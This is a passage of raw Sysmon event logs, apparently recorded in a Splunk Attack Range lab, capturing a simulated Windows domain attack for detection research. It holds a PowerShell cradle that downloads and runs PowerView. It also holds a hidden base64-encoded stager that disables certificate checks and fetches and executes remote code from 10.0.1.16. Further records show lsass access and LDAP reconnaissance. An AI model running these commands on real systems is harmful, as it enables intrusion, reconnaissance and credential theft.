Net.WebClient).DownloadString('http://10.0.1.16:8000/PowerView.ps1');Get-DomainComputer"C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035086054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.284{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3A1426E23593FFB9569D3A495FD97F1,SHA256=DCC9BCD15D52C3C3D18DBD3ADEF465E3D6D889145559F5B9543EE700B3ECC31D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000035086086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.976{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 23542300x800000000000000035086085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B053D749A7A07729A732FCC306D1C99C,SHA256=1E3110717290F1D5BAC6B63FC305BCE1BD804084367E2CCBF65DB0D9A65ADDCD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85B0F2C4CD2BAEEA71CE6ADBFDBCB71E,SHA256=A33473AC7B577DA230E7394FD4DD65B7871EA37A13B445015C9C92D644823D0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=025F667462322650A36FCA40F738C76A,SHA256=670A6BA68C555B86B41C11209E48ADC69D93180035A38AD9AC1800C570576982,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32C5BECE348BA3CAB12B3C147F442CCF,SHA256=3BAD92BDC52252E15E7C543531E67BE53DADA9B73B45CDBA89E5D3E12D87C9E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.807{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B0B6164DEEC385F6DC7138E740B3E27,SHA256=14590B6D4D010F153BE6001E1E9E6AC6C2FCB8FAEB4E3E8CEAAFEF144552DD2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7595FEB9DA836D784B285E4C1EA0668E,SHA256=AE141CE9A5354B71152BCA721FAAF177E146D34DFD93C041A6610FD2A595912F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.153{B81B27B7-4013-611D-1600-00000000C801}11967116C:\Windows\system32\svchost.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.153{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.071{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.071{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4FDB-613A-7D90-03000000C801}6916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035086075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 18:18:04.015{B81B27B7-4FDB-613A-7D90-03000000C801}6916\PSHost.132756850839123695.6916.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035086074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.999{B81B27B7-4FDB-613A-7D90-03000000C801}6916ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_e1zsegry.aop.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.999{B81B27B7-4FDB-613A-7D90-03000000C801}6916ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zxmri55u.bch.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:05.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A6A99FE9BEC5B6CC3EDEA016EC9233,SHA256=F0D454C834E1E95C03E4EED7FD6F63B62EE0C8B59252E3C419003281B0CBDAE3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:05.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=627ECB993738A8D82E69BBB972E36BC7,SHA256=67F1665C890CDF2D30B7DC02FA2CFBE3B11710DC060B575B7FEB99CB3CC60836,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.910{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56794-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:06.837{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9252851399B72C359312AB90698A7759,SHA256=A780AC7DA5BB3E295B70FC5742B61E8B41D4401B223BA0BE8348B54D5DD4D107,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:06.806{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=87C8E2A08CFF15F94F37F77C962E9F34,SHA256=4D9DD1030F025999D6C494F4294E4679A9A2C49138E9CA1A1C20C37D48C9F5A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:06.775{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2EA59DB882AA6AFFEBF459268E766DA7,SHA256=CF1281D81328E6CA9BCDAA9BECBF499D2924F88B915EC852013D456C769BF923,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.321{00000000-0000-0000-0000-000000000000}6916<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56795-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal8000- 23542300x800000000000000035086091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:06.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FF82A969BE055C907A5438167C9E57E2,SHA256=9FD97E661D674D8E0825B188ACCA58CF19C95786B122F783BC3BC0C1D185A804,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:06.053{B81B27B7-4FDB-613A-7D90-03000000C801}6916ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:07.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A1C321FE87D44448D0499CF5C1916C3,SHA256=5E1AC0F7A7135DCAB4D2754094F82DF68DC8F6741122CEB955DE514DA9F27AE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:32.215{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56797-false10.0.1.12-8000- 354300x800000000000000035086101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.999{00000000-0000-0000-0000-000000000000}6916<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56796-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035086100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:07.173{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=890690DD1B66D86EF858F8A8E0F19A49,SHA256=8E96A98D8E5C3D20D937274B469FEC4FF6765BA0FE3205C3581760F6F7280798,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:07.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85B0F2C4CD2BAEEA71CE6ADBFDBCB71E,SHA256=A33473AC7B577DA230E7394FD4DD65B7871EA37A13B445015C9C92D644823D0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035086098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.998{00000000-0000-0000-0000-000000000000}6916WIN-DC-128.ATTACKRANGE.LOCAL0::ffff:10.0.1.14;<unknown process> 22542200x800000000000000035086097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.997{00000000-0000-0000-0000-000000000000}6916_ldap._tcp.WIN-DC-128.ATTACKRANGE.LOCAL.9003-<unknown process> 22542200x800000000000000035086096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.997{00000000-0000-0000-0000-000000000000}6916_ldap._tcp.Default-First-Site-Name._sites.WIN-DC-128.ATTACKRANGE.LOCAL.9003-<unknown process> 23542300x800000000000000035086105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:08.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C42C953711B37F9145FE56EAAFD8638,SHA256=94CBCDA1EE74C2403F39326CF061B0091A9C2EF59C42F10633066AC14EEA105D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:32.486{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56798-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB7109BD23668548FD3D396779D800D,SHA256=3CB4D1394F566101971E7EFFAAF175FB124B83BD3E2A87E90CF2B2C0E53D3B7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:10.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381410984BAFDEE7CF45CB4CF3B89039,SHA256=E17C4F2198A37B71F10F5C0EA46C02C3F0CAA1E69BFED24A2E7A96267E726228,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:11.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E94374285A3B3F99F108DD33C542015,SHA256=A47E14A95ABFE68A9D24BF2DFCA6CF461E6E55E682F2E448585A6738404844CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:12.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921BC3D3C36D345BA912E8CE6DA925AA,SHA256=1FA97D44ECC5E8ADCB03B8D68B603414D03C5E79492D86C2CFD2F564016DB428,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747DC3F2DF119F41F9D193AD1EBB1169,SHA256=6E44A59BF917117D4D61A5954CAE78635CAB7A96F284215DCB00457C5A26A72D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.766{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 